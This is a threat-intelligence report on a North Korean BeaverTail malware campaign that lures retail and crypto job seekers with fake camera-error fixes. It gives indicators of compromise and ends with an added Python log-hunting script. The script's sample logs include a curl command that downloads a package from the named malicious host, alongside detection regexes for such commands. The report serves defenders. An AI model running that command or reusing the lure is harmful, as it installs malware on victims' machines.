BeaverTail Malware Delivered Through Malicious Repositories Targets Retailers

Tech Note – BeaverTail variant distributed via malicious repositories and ClickFix lure
17 September 2025 – Oliver Smith, GitLab Threat Intelligence

We have identified infrastructure distributing BeaverTail and InvisibleFerret malware since at least May 2025, operated by North Korean actors tracked as Contagious Interview and Famous Chollima.

The campaign uses ClickFix lures to target marketing and trader roles within cryptocurrency and retail organizations rather than traditional software development roles. Malware is delivered as compiled executables for macOS, Windows, and Linux, diverging from script-based distribution reliant on interpreters.

Activity appears to be in testing, with low static detection rates and minimal evidence of large-scale deployment.

BeaverTail is a JavaScript-based information stealer first documented by Palo Alto Unit 42 in 2023, commonly hidden in fake code repositories or trojanized npm packages to siphon cryptocurrency wallet data and system credentials.

Infections typically download a second-stage Python stealer and RAT dubbed InvisibleFerret. ClickFix is a social engineering technique that tricks targets into executing malicious commands by simulating fake CAPTCHAs or troubleshooting prompts.

While ClickFix attacks were previously used to spread GolangGhost and FlexibleFerret malware in early 2025, this campaign marks the first known use of ClickFix to deliver BeaverTail.

Infection Chain and ClickFix Lure

In late May 2025, operators hosted a fraudulent hiring platform at businesshire[.]top with Vercel credentials from the hireproflix-iauhsmsuv-gabriels-projects-75362d20.vercel.app domain.

The site impersonated web3 organizations recruiting cryptocurrency traders and a US-based e-commerce retailer seeking sales and marketing applicants or investors.

Visitors were prompted to submit personal details, answer text questions, and record a video response. When attempting video recording, users encountered fake camera errors accompanied by dynamic, OS-specific troubleshooting commands.

These commands—curl or wget invocations with custom user-agent headers—download and install a compiled BeaverTail package from nvidiasdk.fly[.]dev. Without the numeric header, a benign decoy payload is returned, thwarting sandbox analysis.

For macOS and Windows, the payload is delivered as executables bundled via pkg or PyInstaller, ensuring operation on systems lacking JavaScript or Python interpreters.

Linux hosts receive a JavaScript BeaverTail via a shell script that installs nvm and executes node with a downloaded script. InvisibleFerret is delivered in Python or as a compiled binary when Python is absent, providing redundancy on non-developer machines.

The variant in this campaign targets only eight browser extensions—down from 22 in prior campaigns—and omits non-Chrome browsers, reducing its code footprint by one-third.

String obfuscation is limited to base64 slicing, instead of heavy javascript-obfuscator techniques.

The Windows build includes routines to extract Python dependencies from a password-protected 7z archive, a method previously unseen in BeaverTail campaigns but common among broader threat actor toolkits.

Header-based payload filtering represents an emerging guardrail in BeaverTail and OtterCookie operations throughout 2025, minimizing threat actor exposure.

Analysis of Vercel variables links the fake hiring site to the GitHub repository RominaMabelRamirez/hflix, with commits by user dmytroviv.

Hard-coded allowlists of IPs—including 188.43.33.250, a Russian TransTelecom address tied to North Korean activity—suggest operator protection measures.

When visitors access the site, it logs IP and geolocation via api.ipify.org and probes for cryptocurrency wallet objects in the browser before exfiltrating any findings.

Assessment and Recommendations

We assess that this campaign remains in a testing phase, given the scarcity of secondary payload sightings and development artifacts such as a preinstall script referencing a nonstandard MY_PASWOR variable.

The shift from software developer targets to marketing and trading roles across cryptocurrency and retail sectors indicates North Korean operators are adapting to broader, less technical audiences.

The use of compiled executables further demonstrates an intent to compromise systems lacking developer tools.

Organizations in retail and cryptocurrency should hunt for anomalous connections to nvidiasdk.fly[.]dev or 172.86.93.139, monitor for unauthorized installer package executions, and investigate suspicious ClickFix-style pop-ups or troubleshooting prompts.

Proactively scanning for the listed allowlist IP addresses in server logs may uncover operator activity. As public awareness of BeaverTail grows, threat actors are likely to refine their tradecraft and expand target profiles.
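As an added example that is not part of the original note, the following Python hunt applies the recommendations above to constructed sample log lines: it flags the infrastructure indicators quoted in the note, the operator allowlist address, and curl/wget command lines carrying an explicit custom User-Agent of the kind the ClickFix lure instructs victims to run. The log format, the sample records and the URL path are assumptions.

```python
import re
from typing import Iterable

# Indicators quoted in the note above; defanged brackets are removed so they match raw logs.
NETWORK_IOCS = ("nvidiasdk.fly.dev", "172.86.93.139", "businesshire.top")
# Operator allowlist address named in the note; a hit in server logs may reveal operator activity.
OPERATOR_IPS = ("188.43.33.250",)
# curl/wget invoked with an explicit custom User-Agent, the shape of the ClickFix commands described.
CLICKFIX_RE = re.compile(
    r"\b(?:curl|wget)\b.*(?:\s-A\s|--user-agent[= ]|-H\s+['\"]?(?i:user-agent):)"
)


def scan_logs(lines: Iterable[str]) -> list[dict]:
    """Return one finding per indicator hit, in log order."""
    findings = []
    for n, line in enumerate(lines, 1):
        lowered = line.lower()
        for ioc in NETWORK_IOCS:
            if ioc in lowered:
                findings.append({"line": n, "type": "network_ioc", "match": ioc})
        for ip in OPERATOR_IPS:
            if ip in line:
                findings.append({"line": n, "type": "operator_ip", "match": ip})
        if CLICKFIX_RE.search(line):
            findings.append({"line": n, "type": "clickfix_command", "match": line.strip()})
    return findings


# Constructed sample records (proxy, EDR command line, web server); not real telemetry.
SAMPLE_LOGS = [
    "2025-06-02T10:14:03Z proxy CONNECT nvidiasdk.fly.dev:443 user=jdoe",
    "2025-06-02T10:14:05Z edr cmd=\"curl -A 'Mozilla/5.0' https://nvidiasdk.fly.dev/PLACEHOLDER -o /tmp/fix.pkg\"",
    "2025-06-02T10:20:11Z proxy GET https://updates.example.com/patch.zip user=jdoe",
    "2025-06-03T08:01:44Z web src=188.43.33.250 GET /apply HTTP/1.1 200",
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['type']} -> {f['match']}")
```

Feed real proxy, EDR and web-server exports to scan_logs one line at a time; the third sample line shows that ordinary download traffic produces no finding.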

Continuous monitoring of code repositories and supply chain dependencies remains critical to defend against evolving North Korean malware campaigns.
